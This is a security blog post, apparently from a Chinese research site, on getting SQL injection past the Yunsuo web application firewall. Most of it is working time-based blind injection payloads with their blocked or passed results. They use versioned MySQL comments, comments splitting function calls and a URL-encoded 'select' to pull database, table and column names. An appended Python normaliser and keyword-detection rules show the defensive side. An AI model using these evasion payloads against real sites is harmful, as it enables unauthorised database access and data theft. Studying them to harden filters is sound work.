
Bypassing the 云锁 (Yunsuo) WAF in practice

2020-04-09 11:26

Bypassing 云锁

I searched 先知 (xz.aliyun.com) and found that there was no article on bypassing 云锁 at all. There are plenty of 云锁 bypass write-ups elsewhere online, but as far as I can tell the sites they targeted are all gone, or 云锁 has since tightened its rules, so I'll simply record a bypass I pulled off recently.

Bypassing order by

The keyword and was not blocked, so I skipped testing it; a bare order by, as expected, was blocked.

/*!order*//*!by*/1   blocked
/*!40000/*!30000order*//*!40000/*!30000by*/1   not blocked. Here 30000 is a database version number; if the server version is greater than it, the content is executed.

Unable to bypass union select

I spent a lot of time trying to get union select through and never managed it. If any master has a working bypass, please message me privately.... (cries)

Changing approach: starting with time-based blind injection

Querying the database

id=2 and length(database())>1   not blocked; from this we can determine the length of the database name.

Getting the database name

id=2 and if(ascii(substr(database(),1,1))>120,1,sleep(7))   blocked
id=2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7))   not blocked
id=2 and if(ascii(substr(database/*!()*/,1,1))>120,1,sleep/*!(7)*/)   not blocked


Using the payloads above, the database name can be extracted.

Querying the database's tables

id=2 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>96,1,sleep(5))   blocked
id=2 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))   blocked
id=2 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database/*!()*/ limit 0,1),1,1))>96,1,sleep/*!(5)*/)   blocked

Here I removed the payload piece by piece to see what triggered the block and eventually found it was select: with select removed the request is not blocked and instead produces a syntax error.
id=2 and if(ascii(substr(( table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))   not blocked

Now to bypass select
id=2 and if(ascii(substr((/*!Select*/+table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))   blocked
id=2 and if(ascii(substr((/*!40000/*!30000select*/ table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))   blocked
id=2 and if(ascii(substr((/*!50000select*/table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))   blocked
id=2 and if(ascii(substr((/*!50000%53elect*/table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5))   not blocked
With this the table names can be queried directly.

Querying the columns

The last payload above works directly for columns as well:
id=2 and if(ascii(substr((/*!50000%53elect*/column_name from information_schema.columns where table_schema=database/**/() and table_name='xxxx' limit 0,1),1,1))>96,1,sleep/**/(5))   not blocked
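As an added example that is not part of the original post, the Python below shows the defender-side normalisation that undoes the three tricks the post relies on (URL encoding, inline /**/ comments and MySQL versioned comments) before keyword rules run, so the rules see what MySQL would execute. The rule names are hypothetical and the sample inputs are constructed from the payload shapes discussed above.

```python
import re
from urllib.parse import unquote

# Comment forms used in the post: MySQL executes the body of a versioned
# comment /*!NNNNN body */ when its version is at least NNNNN, so the body must
# be kept; an ordinary /* ... */ comment is just whitespace and can be dropped.
_PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
_VERSIONED_OPEN = re.compile(r"/\*!\d{0,5}")
_COMMENT_CLOSE = re.compile(r"\*/")


def normalize(param: str) -> str:
    """Canonicalise a query parameter so keyword rules see what MySQL runs."""
    s = unquote(param)                         # %53elect -> Select
    s = _PLAIN_COMMENT.sub(" ", s)             # database/**/() -> database ()
    s = _VERSIONED_OPEN.sub(" ", s)            # /*!50000select*/ -> select*/
    s = _COMMENT_CLOSE.sub(" ", s)             # strip the dangling closers
    s = re.sub(r"(\w)\s+\(", r"\1(", s)        # database () -> database()
    return re.sub(r"\s+", " ", s).strip().lower()


# Hypothetical rule names; the patterns are the keywords the post's payloads hide.
_RULES = {
    "order_by": re.compile(r"\border\s+by\b"),
    "select": re.compile(r"\bselect\b"),
    "time_delay": re.compile(r"\bsleep\("),
    "schema_probe": re.compile(r"\binformation_schema\."),
}


def classify(param: str) -> list:
    """Names of the rules that fire on the normalised parameter."""
    text = normalize(param)
    return [name for name, rx in _RULES.items() if rx.search(text)]


# Constructed inputs mirroring the payload shapes discussed in the post.
SAMPLES = {
    "versioned order by": "1 /*!40000/*!30000order*//*!40000/*!30000by*/1",
    "split sleep": "2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7))",
    "encoded select": ("2 and if(ascii(substr((/*!50000%53elect*/table_name from "
                       "information_schema.tables where table_schema=database/**/() "
                       "limit 0,1),1,1))>96,1,sleep/**/(5))"),
}

if __name__ == "__main__":
    for label, payload in SAMPLES.items():
        print(f"{label:20} -> {classify(payload)}")
```

Every sample that passed the WAF in the post trips at least one rule once normalised, while a plain numeric id trips none.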


Source: xz.aliyun.com/t/7522
